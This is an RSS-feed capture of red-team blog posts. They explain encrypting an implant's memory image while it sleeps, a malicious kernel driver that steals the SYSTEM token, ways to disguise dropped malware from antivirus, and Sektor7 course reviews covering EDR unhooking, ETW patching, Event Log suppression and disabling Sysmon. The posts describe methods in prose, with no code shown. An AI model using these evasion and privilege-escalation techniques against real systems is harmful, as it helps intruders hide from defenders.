RSS Security

🔒
❌ About FreshRSS
There are new articles available, click to refresh the page.
Before yesterdayUncategorized

SleepyCrypt: Encrypting a running PE image while it sleeps

10 September 2021 at 15:20

SleepyCrypt: Encrypting a running PE image while it sleeps

Introduction

In the course of building a custom C2 framework, I frequently find features from other frameworks I’d like to implement. Cobalt Strike is obviously a major source of inspiration, given its maturity and large feature set. The only downside to re-implementing features from a commercial C2 is that you have no code or visibility into how a feature is implemented. This downside is also an learning excellent opportunity.

One such feature is Beacon’s ability to encrypt its loaded image in memory while it sleeps. It does this to prevent memory scanning from identifying static data and other possible indicators within the image while Beacon is inactive. Since during sleep no code or data is used, it can be encrypted, and only decrypted and visible in memory for the shortest time necessary. Another similar idea is heap encryption, which encrypts any dynamically allocated memory during sleep. A great writeup on this topic was published recently by Waldo-IRC and is available here.

So I set out to create a proof of concept to encrypt the loaded image of a process periodically while that process is sleeping, similar to how a Beacon or implant would.

The code for this post is available here.

Starting A Process

To get an idea of the challenges we have to overcome, let’s examine how an image is situated in memory when a process is running.

During process creation, the Windows loader takes the PE file from disk and maps it into memory. The PE headers tell the loader about the number of sections the file contains, their sizes, memory protections, etc. Using this information, each section is mapped by the loader into an area of memory, and that memory is given a specific memory protection value. These values can be a combination of read, write, and execute, along with a bunch of other values that aren’t relevant for now. The various sections tend to have consistent memory protection values; for instance, the .text sections contains most of the executable code of the program, and as such needs to be read and executed, but not written to. Thus its memory is given Read eXecute protections. The .rdata section however, contains read-only data, so it is given only Read memory protection.

Section Protection

Why do we care about the memory protection of the different PE sections? Because we want to encrypt them, and to do that, we need to be able to both read and write to them. By default, most sections are not writable. So we will need to change the protections of each section to at least RW, and then change them back to their original protection values. If we don’t change them back to their proper values, the program could possibly crash or look suspicious in memory. Every single section being writable is not a common occurrence!

How Can You Run Encrypted Code?

Another challenge we need to tackle is encrypting the .text section. Since it contains all the executable code, if we encrypt it, the assembly becomes gibberish and the code can no longer run. But we need the code to run to encrypt the section. So it’s a bit of a chicken and the egg problem. Luckily there’s a simple solution: use the heap! We can allocate a buffer of memory dynamically, which will reside inside our process address space, but outside of the .text section. But how do we get our C code into that heap buffer to run when it’s always compiled into .text? One word: shellcode.

Ugh, Shellcode??

I know we all love writing complex shellcode by hand, but for this project I am going to cheat and use C to create the shellcode for me. ParanoidNinja has a fantastic blog post on exactly this subject, and I will borrow heavily from that post to create my shellcode.

But what does this shellcode need to do exactly? It has two primary functions: encrypt and decrypt the loaded image, and sleep. So we will write a small C function that takes a pointer to the base address of the loaded image and a length of time to sleep. It will change the memory protections of the sections, encrypt them, sleep for the configured time, and then decrypt everything and return.

Putting It All Together

So the final flow of our program looks like this:

- Generate the shellcode from our C program and include it as a char buffer in our main test program called `sleep.exe`
- In `sleep.exe`, we allocate heap memory for the shellcode and copy it over
- We get the base address of our image and the desired sleep time
- We use the pointer to the heap buffer as a function pointer and call the shellcode like a function, passing in a parameter
- The shellcode will run, encrypt the image, sleep, decrypt, and then return
- We're back inside the `.text` section of `sleep.exe`, so we can continue to do our thing until we want to sleep and repeat the process again

Sleep.exe

Since it’s the simplest, let’s start with a rundown of sleep.exe.

First off, we include the shellcode as a header file. This is generated from the raw binary (which we’ll cover shortly) with xxd -i shellcode.bin > shellcode.h. Then we define the struct we will use as a parameter to the shellcode function, which is called simply run. The struct contains a pointer for the image base address, a DWORD for the sleep time, and a pointer to MessageBoxA, so we can have some visible output from the shellcode. In a real implant you would probably want to omit this. Lastly we create a function pointer typedef, so we can call the shellcode buffer like a normal function.

Struct in sleep.c

Next we begin our main function. We take in a command line parameter with the sleep time, dynamically resolve MessageBoxA, get the image base address with GetModuleHandleA( NULL ), and setup the parameter struct. Then we allocate our heap buffer and copy the shellcode payload into it:

Setup in sleep.c

Finally we create a function pointer to the shellcode buffer, wait for a keypress so we have time to check things out in Process Hacker, and then we execute the shellcode. If all goes well, it will sleep for our configured time and return back to sleep.exe, popping some message boxes in the process. Then we’ll press another key to exit, showing that we do indeed have execution back in the .text section.

Run in sleep.c

C First, Then Shellcode

Now we write the C function that will end up as our position-independent shellcode. ParanoidNinja covers this pretty well in his post, so I won’t rehash it all here, but I will mention some salient points we’ll need to account for.

First, when we call functions in shellcode on x64, we need the stack to be 16 byte aligned. We borrow ParanoidNinja’s assembly snippet to do this, using it as the entry point for the shellcode, which then calls our run function, then returns to sleep.exe.

Next we need to consider calling Win32 APIs from our shellcode. We don’t have the luxury of just calling them as usual, since we don’t know their addresses and have no runtime support, so we need to resolve them ourselves. However, the usual method of calling GetProcAddress with a string of the function to resolve is tricky, as we already need to know the address of GetProcAddress to call it, and using strings in position-independent shellcode requires them to be spelled out in a char array like this: char MyFunc[] = { 'h', 'i', 0x0 };. What we can do instead is use the tried and true method of API hashing. I have borrowed a custom GetProcAddress implementation to do this from here, combining it with a slightly modified djb2 hash algorithm. Here’s how this looks for Sleep and VirtualProtect:

Function resolution in run.c

PE Parsing Fun

Now that we’re able to get the function pointers we need, it’s time to address encrypting the image. The way we’ll do this is by parsing the PE header of the loaded image, since it contains all the information we need to find each section in memory. After talking with Waldo-IRC, it turns out I could also have done with with VirtualQuery, which would make it a more generalizable process. However I did it the PE way, so that’s what I’ll cover here.

The first parameter of our argument struct to the shellcode is the base address of the loaded image in memory. This is effectively a pointer to the beginning of the MSDOS header. So we can use all the usual PE parsing techniques to find the beginning of the section headers. PE parsing can be tedious, so I won’t give a detailed play by play, just the highlights.

Once we have the address of the first section, we can get the three pieces of information we need from it. First is the actual address of the section in memory. The IMAGE_SECTION_HEADER structure contains a VirtualAddress field, which when combined with the image base address, gives us the actual address in memory of the section.

Next we need the size of that section in memory. This is stored in the VirtualSize field of the section header. However this size is not actually the real size of the section when mapped into memory. It’s the size of the actual data in the section. Since by default memory in Windows is allocated in pages of 4 kilobytes, the VirtualSize value is rounded up to the nearest multiple of 4k. The bit twiddling code to do this was taken from StackOverflow here.

The last piece of information about the section we need is the memory protection value. This is stored in the Characteristics field of the section header. This is a DWORD value that looks something like 0x40000040, with the left-most hex digit representing the read, write, or execute permission we care about. We do a little more bit twiddling to get just this value, by shifting it to the right by 28 bits. Once we get this value by itself, we save it in an array indexed by the section number so that we can reuse it later to reset the protections:

Shifting characteristics in run.c

Encryption

Now that we can find each section, know its size, and can restore its memory protections, we can finally encrypt. In the same loop where we parsed each section, we call our encryption function:

Shifting characteristics in run.c

The encryption/decryption functions take the address, size, and memory protection to apply, as well as a pointer to the address of the VirtualQuery function, so that we don’t have to resolve it each time:

Encrypt/decrypt functions in run.c

To encrypt, we change the memory protections to RW, then XOR each byte of the section. Once we have encrypted each section, we finish by encrypting the PE headers. They reside in a single 4k page starting at the base address. With that, the entire loaded image is encrypted!

Sleep and Decryption

Now that we’ve encrypted the entire image, we can sleep by calling the dynamically resolved Sleep function pointer, using the passed-in sleep duration DWORD.

Once we’ve finished sleeping, we decrypt everything. We have to make sure that we decrypt the PE headers page first, because we use it to find the addresses of all the other sections. Then we pop a message box to tell us we’re done, and return to sleep.exe!

Getting The Shellcode

ParanoidNinja covers this part in detail as well, but briefly the process is this:

- Compile the stack alignment assembly and the C code to an object file
- Link the two object files together into an EXE
- Use `objcopy` to extract just the `.text` into file
- Convert the shellcode file into a `char` array for `sleep.c`

Demo Time

To verify everything is being encrypted and decrypted properly, we can use Process Hacker to inspect the memory. Here I’ve called sleep.exe with a 5 second sleep time. The process has started, but since I haven’t pressed a key, everything is still unencrypted:

PE headers unencrypted

Here I have pressed a key and the encryption process has started. I have pressed “Re-Read” memory in Process Hacker, and you can see that the header page has been XOR encrypted:

PE headers encrypted

After the sleep is finished and decryption takes place, we get a message box telling us we’re done. Once we refresh the memory in Process Hacker, we can see we have the PE header page back again!

Demo complete

You can repeat this with each section in Process Hacker and see that they are all indeed encrypted.

Conclusion

I find it really educational to recreate Cobalt Strike features, and this one was no exception. I don’t know if this is at all close to how Cobalt Strike handles sleep obfuscation, but this does seem to be a viable method, and I will likely tweak it further and include it in my C2 framework. If you have any questions or input on this, please let me know or open an issue on Github.

Stealing Tokens In Kernel Mode With A Malicious Driver

28 July 2021 at 15:20

Stealing Tokens In Kernel Mode With A Malicious Driver

Introduction

I’ve recently been working on expanding my knowledge of Windows kernel concepts and kernel mode programming. In the process, I wrote a malicious driver that could steal the token of one process and assign it to another. This article by the prolific and ever-informative spotless forms the basis of this post. In that article he walks through the structure of the _EPROCESS and _TOKEN kernel mode structures, and how to manipulate them to change the access token of a given process, all via WinDbg. It’s a great post and I highly recommend reading it before continuing on here.

The difference in this post is that I use C++ to write a Windows kernel mode driver from scratch and a user mode program that communicates with that driver. This program passes in two process IDs, one to steal the token from, and another to assign the stolen token to. All the code for this post is available here.

About Access Tokens

A common method of escalating privileges via buggy drivers or kernel mode exploits is to the steal the access token of a SYSTEM process and assign it to a process of your choosing. However this is commonly done with shellcode that is executed by the exploit. Some examples of this can be found in the wonderful HackSys Extreme Vulnerable Driver project. My goal was to learn more about drivers and kernel programming rather than just pure exploitation, so I chose to implement the same concept in C++ via a malicious driver.

Every process has a primary access token, which is a kernel data structure that describes the rights and privileges that a process has. Tokens have been covered in detail by Microsoft and from an offensive perspective, so I won’t spend a lot of time on them here. However it is important to know how the access token structure is associated with each process.

Processes And The _EPROCESS Structure

Each process is represented in the kernel by a doubly linked list of _EPROCESS structures. This structure is not fully documented by Microsoft, but the ReactOS project as usual has a good definition of it. One of the members of this structure is called, unsurprisingly, Token. Technically this member is of type _EX_FAST_REF, but for our purposes, this is just an implementation detail. This Token member contains a pointer to the address of the token object belonging to that particular process. An image of this member within the _EPROCESS structure in WinDbg can be seen below:

Token in WinDbg

As you can see, the Token member is located at a fixed offset from the beginning of the _EPROCESS structure. This seems to change between versions of Windows, and on my test machine running Windows 10 20H2, the offset is 0x4b8.

The Method

Given the above information, the method for stealing a token and assigning it is simple. Find the _EPROCESS structure of the process we want to steal from, go to the Token member offset, save the address that it is pointing to, and copy it to the corresponding Token member of the process we want to elevate privileges with. This is the same process that Spotless performed in WinDbg.

The Driver

In lieu of exploiting a kernel mode exploit, I write a simple test driver. The driver exposes an IOCTL that can be called from user mode. It takes struct that contains two members: an unsigned long for the PID of the process to steal a token from, and an unsigned long for the PID of the process to elevate.

PID Struct

The driver will find the _EPROCESS structure for each PID, find the Token members, and copies the target process token to the destination process.

The User Mode Program

The user mode program is a simple C++ CLI application that takes two PIDs as arguments, and copies the token of the first PID to the second PID, via the exposed driver IOCTL. This is done by first opening a handle to the driver by name with CreateFileW and then calling DeviceIoControl with the correct IOCTL.

User Mode Code

The Driver Code

The code for the token copying is pretty straight forward. In the main function for handling IOCTLs, HandleDeviceIoControl, we switch on the received IOCTL. When we receive IOCTL_STEAL_TOKEN, we save the user mode buffer, extract the two PIDs, and attempt to resolve the PID of the target process to the address of its _EPROCESS structure:

IOCTL Switch

Once we have the _EPROCESS address, we can use the offset of 0x4b8 to find the Token member address:

Token Offset

We repeat the process once more for the PID of the process to steal a token from, and now we have all the information we need. The last step is to copy the source token to the target process, like so:

Copy Token

The Whole Process

Here is a visual breakdown of the entire flow. First we create a command prompt and verify who we are:

Whoami

Next we use the user mode program to pass the two PIDs to the driver. The first PID, 4, is the PID of the System process, and is usually always 4. We see that the driver was accessed and the PIDs passed to it successfully:

User Mode Program

In the debug output view, we can see that HandleDeviceIoControl is called with the IOCTL_STEAL_TOKEN IOCTL, the PIDs are processed, and the target token overwritten. Highlighted are the identical addresses of the two tokens after the copy, indicating that we have successfully assigned the token:

Copy Token Debug View

Finally we run whoami again, and see that we are now SYSTEM!

Whoami System

We can even do the same thing with another user’s token:

Whoami 2

Conclusion

Kernel mode is fun! If you’re on the offensive side of the house, it’s well worth digging into. After all, every user mode road leads to kernel space; knowing your way around can only make you a better operator, and it expands the attack surface available to you. Blue can benefit just as much, since knowing what you’re defending at a deep level will make you able to defend it more effectively. To dig deeper I highly recommend Pavel Yosifovich’s Windows Kernel Programming, the HackSys Extreme Vulnerable Driver, and of course the Windows Internals books.

On Disk, The Devil’s In The Details

23 July 2021 at 15:20

On Disk, The Devil’s In The Details

Introduction

During red team operations and penetration tests, there are occasions where you need to drop an executable to disk. It’s usually best to stay in memory and avoid this if possible, but there are plenty of situations where it’s unavoidable, like DLL sideloading. In these cases, you typically drop a custom malicious PE file of some sort. Being on disk instead of in memory opens you up to the world of AV static analysis and the set of challenges bypassing it presents. There are many resources on the net about avoiding AV signatures, say for example Metasploit shellcode, by using string obfuscation, encryption, XORs, pulling down staged payloads over the network, shrinking the import table, polymorphic encoding, etc. I’m going to assume you’ve done your due diligence and handled the big stuff. However there are some other more subtle indicators and heuristics AV can use to help spot a malicious binary when it is present on disk. These are what this post is all about.

Data About Data

When you compile a binary, whether it’s a DLL or an EXE, the compiler will automatically include a certain amount of metadata about the resulting binary, such as the compliation date and time, compiler vendor, debug files, file paths, etc. This “data about data” can reveal a lot about an executable, especially an executable never encountered by a given AV engine.

The AV engine’s job is to take files, inspect the metadata, apply heuristics, and determine liklihood of it being malicious. Clearly the more metadata and information we leave in our dropped binary, the more likely it is to be flagged. We are automatically at a disadvantage, since we are writing custom code that has never been seen by the AV engine and its file hash is unfamiliar. Compare that to a very commonly-seen file, like a Firefox installer MSI with a known hash and metadata, seen by many installations of the AV software across customer locations, and you can see how a custom compiled binary can stick out.

All is not lost, however. AV can’t simply declare every newly-seen file malicious, as all known-good files start off as unknown at some point. So the AV must use imperfect signatures, metadata, and heuristics to make a good vs. bad determination. We want to remove as many pieces of information that could push us towards a positive dectection as we can.

Now will making these changes make your malicious payload FUD and guaranteed to slip through? Not at all. If you’re dropping unencrypted Cobalt Strike shellcode all over the place, you’re done. But as AV and EDR gets better, the more important it is to give them as little information as possible. And who wants to burn a perfectly crafted custom payload beacuse you left some silly string in? It’s not a magic bullet, it’s not even an ordinary unmagical bullet, but every little bit helps.

Code Signing

One way developers can help signal to Windows and AV engines that their software is not malicious is by using code signing certs. These are (supposed to be) expensive and difficult to obtain x.509 certificates that can be used to cryptographically sign a compiled binary. The idea is that only the legitimate and properly vetted owner should have access to the private key, and must have legitimately signed the file, indicating that it is trustworthy. This gives AV a high fidelity way of identifying the author.

There are two problems with this approach though. Stuxnet famously stole multiple valid code signing certs in order to sign its payloads and help avoid detection. Certificate private keys occasionally end up committed to Github as well. So a validly signed cert is never a 100% guarantee of non-maliciousness.

The other issue is that sometimes AV engines fail to check the validity of a certificate at all, instead simply checking to see if the file has been signed. Which means as long as we can sign our payload with any old self-signed cert, we would pass this particular check. Lucky for us, anyone can generate a code signing cert and use it to sign their malware. It’s free and easy to automate. This Stack Overflow post shows how to create one on Windows and how to use signtool to sign a binary. On Linux, you can use Limelighter to sign with an existing certificate, or download the cert from a website and use it as a code signing cert:

Limelighter

And the resulting self-signed binary:

Signed Binary

CarbonCopy is another good tool that can use website certificates to sign a file.

File Properties

Another piece of data, or rather lack of data, are the file properties of an executable. By default, this information is not included when you compile a binary. It looks like this:

Empty Details

It must be added via a resource file and compiled into the binary. This missing information is another, somewhat low fidelity, indicator that a file may not have been produced by a legitimate software vendor, and is therefore more likely to be malicious. Admittedly, this is probably not a huge red flag to most AV, but it’s easy enough to implement, so why not? The details add up.

Creating the resource file is not the most straightforward process. I found the easiest way was to let Visual Studio create it for me. You create a new item of the type resource, and then add a Version resource. Tweak it how you’d like, and the save the resulting Resource.rc file. I’ve created one and stripped out the extraneous lines for easy use here.

Here are two gists for creating the object file to include with your compilation sources: Windows and Linux. Thanks to Sektor7 for the Windows version.

Here is the result of including a resource file during compilation:

File properties

The Rich Header

The Rich header is an undocumented field within the PE header of Windows executables that were created by a Microsoft compiler. It captures some information about the compilation process, including the compiler and linker versions, number of files compiled, objects created, etc. It has been covered in some depth in several places, but a good recap and analysis is here.

Because this header encodes rather specific information about an executable, it provides a way of tracking it between systems. AV engines can use it match up strains of malware, attribution, etc. Some threat actors are aware of this fact however, and try to use it to their advantage. The most well-known case of this was the OlympicDestroyer malware, which spoofed its Rich header to resemble the Lazarus group.

I don’t have code or specific recommendations here, mainly because what you might want to do with the Rich header will depend on what you want to acheive. It is worth knowing about, because it is an indicator that you can use, or have used against you. For instance, the GCC compiler doesn’t include the Rich header. If the environment you’re operating in is dominated by Windows machines, much of the software runnning was likely compiled by Visual Studio. Running a GCC or MinGW compiled binary alone isn’t enough on its own to get you caught, but it may make you stand out, which can often mean the same thing. So you may want to add a Rich header, or remove it, or change it to emulate an adversary, or do nothing at all with it. Just know that it exists, and be aware of what it might tell the opposition about your file. Knowledge is power after all.

If you would like to at least remove the Rich header, peupdate can handle that for you. Another option would be one of the PE parsing Python libraries.

Here is a breakdown of the Rich header, courtesy of the wonderful PE-bear. Note the references to masm and the Visual Studio version used.

PE-bear

Compile Times

Another indicator AV can use to help determine maliciousness in a file is the compilation time. The idea is that most software will have been compiled some time in the past before it is used. A very recently compiled binary, say within the past day or even hour, could look very suspicious, especially running on Bob in HR’s machine, who probably isn’t doing any programming. Even a signed binary with no other obvious signs of being malicious, depending on the compile time, can look mighty strange. As always, context matters. If by chance you’ve breached the development network, new binaries are business as usual.

One complication with timestamps in a PE file is the sheer number of them. This post puts the number at 8, though some are not always included, or are simply for managing bound imports and are not full timestamps. A tool is included for viewing them, and tools like PEStudio are great for this as well. Two commonly modified timestamps are the TimeDateStamp of the COFF File Header, and the TimeDateStamp field of the debug directory:

PEStudio

Like the Rich header, timestamps are not something that must be changed. They are just another piece of information to be aware of, something that can tell the blue team a story. You get to decide what story is appropriate, depending on the context of the engagment.

For an excellent deep dive into timestamps, I recommend this blog post.

Conclusion

The main theme of this post has been about knowing the little details of the malware you write, and the context in which you deploy that malware. Context matters, details add up, and they can make or break an engagement. I hope this list of subtleties will come in handy on your next engagement.

A Review of the Sektor7 RED TEAM Operator: Windows Evasion Course

3 May 2021 at 15:20

A Review of the Sektor7 RED TEAM Operator: Windows Evasion Course

Introduction

Another Sektor7 course, another review! This time it’s the RED TEAM Operator: Windows Evasion Course. You can catch my previous reviews of the RTO: Malware Development Essentials and RTO: Malware Development Intermediate courses as well.

Course Overview

This course, like the previous ones, builds on the knowledge gained in the previous courses. You don’t need to have taken the others if you already have a background in malware development, C++, assembly, and debugging, but if you haven’t, this will very likely be too advanced. The Essentials course might be much more your speed.

Here’s what Windows Evasion covers, according to the course page:

- How a modern detection looks like
- How to get rid of process' internal operations monitoring
- How to make your payload look benign in memory
- How to break process parent-child relation
- How to disrupt EPP/EDR logging
- What is Sysmon and how to bypass it

The course is split into 3 main sections: essentials, non-privileged user vector, and high-privileged user vector. I’ll cover each one, and then provide some thoughts on the course as a whole and the value it provides.

Section 1: Essentials

The course begins as usual, with links to the code and a custom VM with all the tools you’ll need. The first lesson is detail on how modern EDR detection works, covering the different user-mode and kernel-mode components, static analysis, DLL injection, hooking, kernel callbacks, logging, and machine learning. This is as good an overview of the end to end setup of EDRs as I’ve seen. It lays the foundation for the subsequent topics in a nice logical way. It also covers the differences between EDRs and AV, how Sysmon fits in, and how the line between AV and EDRs is becoming more blurred.

Next in essentials, the focus is on defeating various static analysis techniques, specifically entropy, image file details, and code signing. The idea is to make your malicious binary as similar to known-good binaries as possible, with special attention paid the the elements that are commonly flagged by static analysis. None of this is ground-breaking or totally novel, but it does drive home the idea that details matter, and they can add up to successfully achieving execution on a target or being caught.

Section 2: Non-Privileged User Vector

Un/Hooking

The second section covers a range of techniques that can be performed without needing elevated privileges. It begins with an explanation and demonstration via debugger of system call hooking, as performed by the main AV/EDR stand-in for the course, BitDefender. Bitdefender is a good option here, as a trial license is freely available, and it does more EDR-like things than a normal AV, like hooking.

Next, several different methods of defeating user-mode hooking are demonstrated, beginning with the classic overwriting of the .text section of ntdll.dll, which I’ve also covered here. The main disadvantage of this method is the need to map an additional new copy of ntdll.dll into the process address space, which is rather unusual from an AV/EDR perspective.

One alternative to this is to use Hell’s Gate, by Am0nsec and Smelly. This method uses some clever assembly to dynamically resolve the syscall number of a given function from the local copy of ntdll.dll and execute it. However this method has some drawbacks as well, mainly the fact that it will fail if the function to be resolved has already been hooked.

Reenz0h has a neat new modification (new to me at least!) to Hell’s Gate that gets around this problem, which he calls Halo’s Gate. It takes advantage of the fact that the system calls contained within ntdll.dll are sorted in numerically ascending order. The trick is to identity that a syscall has been hooked by checking for the jmp opcode (0xE9), and then traversing ntdll.dll both ahead and behind the target syscall. If an unhooked syscall is found 8 functions after the target, and its value is 0xFD, then by subtracting 8 from 0xFD, the the resulting 0xFD is our target syscall number. The same applies for a syscall before the target function. As no EDR hooks every syscall, eventually a clean one will be found and the target syscall number can be successfully calculated. This property of ordered syscall numbers in ntdll.dll is exploited to great effect in Syswhispers2. It was originally documented by the prolific modxp in a blog post here.

The last method of unhooking is a twist on the first, named, and I quote, “Perun’s Fart”. The goal is to get a clean copy of ntdll.dll without mapping it into our process again. It turns out that if a process is created in a suspended state, ntdll.dll is mapped by the Windows loader as part of the normal new process creation flow, but EDR hooks are not applied, since the main thread has not yet begun execution. So we can steal its copy of ntdll.dll and overwrite our local hooked version. Obviously this is a trade off, as this method will create a new process and involve cross-process memory reads. Still, it’s good to have multiple options when it comes to unhooking.

ETW Bypass

Next up is coverage of Event Tracing for Windows (ETW), how it can rat you out to AV/EDR, and how to blind it in your local process. ETW is especially relevant when executing .NET assemblies, such as in Cobalt Strike’s execute-assembly, as it can inform defenders of the exact assembly name and methods executed. The solution in this case is simple: Patch the ETWEventWrite function to return early with 0 in the RAX register. Anytime an ETW event is sent by the process, it will always succeed, without actually sending the message. Sweet and simple.

Avoiding IOCs

The last few videos of Section 2 cover different methods of hiding some specific indicators that can reveal the presence of malicious activity. First is module stomping. This is a way of executing shellcode from within a loaded DLL, avoiding the telltale sign of memory allocations within the process that are not backed by files on disk. A DLL that the host process does not use is loaded, then partially hollowed out and replaced with shellcode. Since the original DLL is properly loaded, no indication of injected shellcode is present.

Lastly this section covers hiding parent-child process ID relationships. The usual method is covered for PPID spoofing, using UpdateProcThreadAttribute to set the PPID to an arbitrary parent process. However two other methods I’d not encountered were covered as well. First, it turns out that processes created by the Windows task scheduler become a parent of the task scheduler svchost.exe process, and code is provided to use the Win32 API to execute a payload this way. The other method is one used by Emotet, which uses COM to programatically run WMI and create a new process. The parent in this case is the WmiPrvSE.exe process.

Section 3: High-Privileged User Vector

This section covers a variety of techniques that are available in high-privilege contexts. The focus is on Windows Eventlog, interrupting AV/EDR network communication, and Sysmon.

Eventlog

One video covers a method of hiding your activities from the Windows Eventlog. The idea is that the service that service responsible for Eventlog, Windows Event Log, has several threads that handle the processing of event log messages. By suspending these threads, the service continues to run, but does not process any events, thus hiding our activity. One caveat is that if the threads are resumed, all events that were missed in the interim will be processed, unless the machine is rebooted.

AV/EDR Network Communication

The next section looks at severing the connection between AV/EDR and its remote monitoring/logging server. This is done in two primary ways: adding Windows Firewall rules, and sink-holing traffic via the routing table. These two are pretty self-explanatory, but the real value here is the code samples provided for doing this in C/C++. The infamous and terrible COM is used in several places, and provides a good working example of COM programming. Creating routing table entries is actually a simple Win32 API call away.

Sysmon

The final section of the course covers identifying and neutralizing Sysmon. Sysmon is an excellent tool and frequently the backbone of many AV/EDR collection strategies, so identifying its presence and disabling its capabilities can go a long way in hiding your activities.

One problem for attackers is that Sysmon by design can be concealed in various ways. The name of the user-mode process, the minifilter driver name, and its altitude can all be modified to hide Sysmon’s presence. However there are enough reliable ways, like checking registry keys, to identify it. Code and commands are provided to find the registry keys and several techniques for shutting down Sysmon as well. One is to unload the minifilter driver. Another harks back to earlier in the course and shows how to patch our friend ETWEventWrite.

Takeaways

If you’ve read my other reviews of Sektor7 courses, you know what I’m going to say here. They are fantastic, and a fantastic value for the money as well, as most are around $200-250 USD. You can buy all 5 current courses for less than almost any other training out there, and 2573 times less than a single SANS course. You get lifetime access, and most importantly, the code samples. This to me is by far the single most valuable part of the course. Reenz0h is a great instructor with a wealth of knowledge and a great presentation style, but the true gift he gives you is a firm foundation of working code samples to build from and the context of how they are used. This course specifically covers basic COM programming in as understandable a way as COM can be covered, in my opinion. I’ve found that I learn best when I have some working code to tweak, play with, lookup its functions on MSDN, and mold it until it does what I want. No, the samples are not production ready and undetectable in every case, but these course give you the tools to make them that way and integrate them into your own tooling.

Conclusion

Props again to reenz0h and the Sektor7 crew. I’m glad they took a poll of their students and delivered a more advanced course. I get the feeling there is a ton more advanced material they could crank out, and I can’t wait for it.

A Review of the Sektor7 RED TEAM Operator: Malware Development Intermediate Course

30 October 2020 at 15:20

A Review of the Sektor7 RED TEAM Operator: Malware Development Intermediate Course

Introduction

I recently completed the newest Sektor7 course, RTO: Malware Development Intermediate. This course is a followup to the Essentials course, which I previously reviewed here. If you read my Essentials review, you know that I am a big fan of Sektor7 courses, having completed all 4 that they offer. This course is easily as good as the others, and probably my favorite one yet.

Course Overview

This course builds on the material in the Essentials course, covering more advanced topics and a wider range of techniques. You don’t need to have taken the Essentials course, but it will be easier if you have taken it or already have background knowledge in C, Windows APIs, code injection, DLLs, etc. This is not a beginner course, but the code is well commented and the videos explain the concepts and what the code is doing very well, so with some effort you’ll probably be OK.

Here’s what the Intermediate covers, according to the course page:

- playing with Process Environment Blocks and implementing our own function address resolution
- more advanced code injection techniques
- understanding how reflective binaries work and building custom reflective DLLs, either with source or binary only
- in-memory hooking, capturing execution flow to block, monitor or evade functions of interest
- grasping 32- and 64-bit processing and performing migrations between x86 and x64 processes
- discussing inter process communication and how to control execution of multiple payloads

Module 1: PE Madness

The course begins like Essentials, with a link to the code and a custom VM with all the tools you’ll need. It then does a deep dive into various aspects of the PE format. It’s not comprehensive, which is not surprising if you’ve ever parsed PE headers, but it covers the relevant parts quite well, and in a visual, easy to grasp way thanks to PE-Bear. The main takeaway is understanding the PE header well enough to dynamically resolve function addresses, a technique that is used later to reduce function imports, and to perform reflective DLL injection. I already have some experience with PE parsing, but it’s a foundational topic and seeing someone else’s approach and explanations is always helpful. Getting a deeper dive into PE-Bear’s capabilities is a nice bonus as well.

Next this module covers a custom implementation of GetModuleHandle and GetProcAddress, leveraging the previously covered PE parsing knowledge. This is done to reduce the number of suspicious API calls in the import table, and a code sample is provided to create a PE file with no import table at all.

Module 2: Code Injection

The second module covers five different shellcode injection techniques. The first is the classic OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread chain, with some variations thrown in when creating the remote thread. Next is a common thread hijacking technique using Get/SetThreadContext. Third is a different memory allocation method that takes advantage of mapping section views in the local and remote processes, ala Urban/SeasideBishop. The last two methods make use of Asynchronous Procedure Calls (APCs), covering both the standard OpenProcess/QueueUserAPC method and the “Early Bird” suspended process method. All five methods use AES encrypted shellcode and obfuscate some function calls using the custom GetModuleHandle and GetProcAddress implementations form Module 1.

Module 3: Reflective DLLs

This section was one of my favorites, as I didn’t have a lot of experience with reflective DLL injection. It covers the classic Stephen Fewer ReflectiveLoader method to create a self-loading DLL and inject it into a remote process without needing to touch disk. The previously covered PE parsing is essential for understanding this part. Also covered is shellcode Reflective DLL Injection (sRDI), by monoxgas, which allows you to convert a compiled DLL into shellcode and inject it. These two techniques are combined to enable the reflective injection of DLLs that you may not have the source for or do not have a reflective loader function exported.

Module 4: x86 vs x64

This was my other favorite section, as it was another area I didn’t have a ton of prior experience with. It covers Windows on Windows 64 (WOW64), how 32-bit processes run on modern x64 Windows, and the ins and outs of injecting between x86 and x64 processes. It touches on Heaven’s Gate, not in extreme detail, as it’s a pretty deep topic that needs a fair bit of background to fully grasp, but enough to get the gist and to be able to make use of it in practice. Templates are provided that use shellcode from Metasploit (also written by Stephen Fewer) to transition from x86 to x64 and inject from a 32-bit process into a 64-bit process, courtesy of some of the code injection techniques from Module 2.

Module 5: Hooking

Module 5 covers three different methods of performing function hooking. It starts with the well-known Microsoft Detours library, which makes hooking different functions a breeze. The second method is Import Address Table (IAT) hooking, which again uses PE parsing knowledge from earlier in the course. The last method was my favorite, as I’d not played with it in the past. It involves inline patching of function addresses. All three methods come with the usual well-commented code samples for easy modification.

Module 6: Payload Control via IPC

This was a short but sweet section on controlling the number of concurrently running payloads. The idea is to check if your implant is already running on a target machine, and bail out if it is. This is useful in persistence scenarios where your chosen persistence method may trigger your payload or shell multiple times. It works by creating a uniquely named instance of one of four different synchronization primitives: mutexes, events, semaphores, or named pipes. A check is performed when initializing the implant, and if one of the uniquely named objects exists, then another instance of the implant must already be running, so the current one exits. Malware is also known to use this trick, as well as legitimate applications that don’t allow multiple concurrent running instances.

Module 7: Combined Project

The combined project makes use of most of the previous modules and puts them together to emulate a somewhat real-world scenario: stealing the password of a VeraCrypt volume via API hooking. I really liked this section as it applied the learned concepts in a cohesive way into a project that you could conceivably see in real life. Some additional requirements are in place, namely needing to inject reflective DLLs and cross from x86 to x64. There are also some suggested followup assignments to expand and improve upon the final project and make it stealthier.

Takeaways

I really liked this course a lot, as I expected to from my past experience with Sektor7 courses. I already had experience with most of the topics, but the clarity with which the topics are presented and the supplied working code samples really solidified what I already knew and taught me a fair bit that I didn’t. I can’t stress enough how helpful the code samples are, as I find the best way for me to learn a new technique is to have a very simple working version to wrap my head around, and then slowly start to add features or make it more advanced. The samples in this course, as well as the other Sektor7 courses, do this very well. They aren’t the most cutting edge, and they won’t beat AV out of the box, but that’s not their purpose. They are teaching tools, and excellent ones at that.

I want to talk a bit about how to get the most value out of this and other Sektor7 courses. It might be easy to just watch the videos, compile the examples, and think “huh, that’s it?”. The real value is having clear explanations of code samples, and then taking that code, playing with it, and making your own. In the Essentials course, I looked up every API call and function I wasn’t familiar with on MSDN and added it as a comment in the code. I made sure I understood exactly what each line did and why. I was familiar with all of the APIs in this course, but even before beginning the videos for a module, I read the code and tried to already have an understanding of it before it was explained. These courses have a lot to give you, as long as you put in your share of effort with the code.

Conclusion

